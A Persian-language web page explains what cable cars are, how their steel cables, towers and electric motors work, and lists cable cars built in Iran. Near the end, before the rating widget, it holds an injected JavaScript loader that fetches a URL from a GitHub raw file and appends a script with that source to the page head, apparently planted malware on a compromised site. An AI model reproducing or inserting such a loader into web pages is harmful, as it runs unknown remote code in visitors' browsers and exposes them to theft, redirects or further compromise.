تله کابین

  • تله کابین گونه ای آسانسور هوای است که معمولا برای جا به جای مردم یا کالا در کوهستان ها استفاده می شود

    تله کابین چیست؟

    تله‌کابین از یک حلقه طولانی و کابل فولادی و دکل هایی در میان آن دو ایستگاه تشکیل شده. در فواصل مساوی کابین هایی به کابل وصل می شوند و کابل توسط موتوری برقی در یکی از ایستگ ها به حرکت در می آید.

    معمولا تله کابین در پیست های اسکی کاربرد زیادی دارد.

    واژه تله کابین از ریشه زبان فرانسوی گرفته شده و اولین بار نیز در کشور فرانسه ساخته شده. تله کابین نوعی آسونسر هوایی است که بیشتر کابردش برای در پیست اسکیت و توریستی استفاده می شود. این وسیله ار مجموعه کابین یا نیمکت های فلزی و حلقه های طولانی کابل فولادی با دکل ها و موتور های برقی تشکیل شده است. به طوری که حلقه های طولانی کابل فولادی که بین ایستگاه های قرار دارند به وسیله دکل هایی که در میان این ایستگاه به عنوان نگهدارنده کابل از طریق پیچ و مهره هستند، مردم و یا کالاها را  از ایستگاهی به ایستگاه دیگر جابجا می کند. کابل های حد فاصل بین ایستگاه ها توسط موتورهای برقی که در ایستگاه مستقرند، حرکت می کنند.

    احداث آسانسورهوایی

    احداث تله کابین از نظر نوع کاربری در مناطق مختلف، متفاوت می باشد و این کاربری ها می توانند: ورزشی، توریستی، حمل و نقل کالا یا انسان باشد. امروزه تفریح از طریق آسانسورهوایی در زمینه گردشگری در سراسر دنیا و از جمله در ایران نقش بسیار مهمی را ایفا می کند. با استفاده از این وسیله می توانیم از بالای کوه ها به تماشای مناظر و بخش های از ارتفاعات کوه ها بپردازیم و از این که طبیعت زیر پایمان است، لذت ببریم.

    انواع آسانسورهوایی در ایران

    آسانسورهوایی هایی که در ایران احداث شده اند عبارتند از:آسانسورهوایی حیران در آستارا، آسانسورهوایی نمک آبرود، آسانسورهوایی لاهیجان، آسانسورهوایی اصفهان، آسانسورهوایی بام سبز رامسر، آسانسورهوایی توچال،آسانسورهوایی گنج نامه درهمدان، تله کابین عون بن علی در تبریز.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید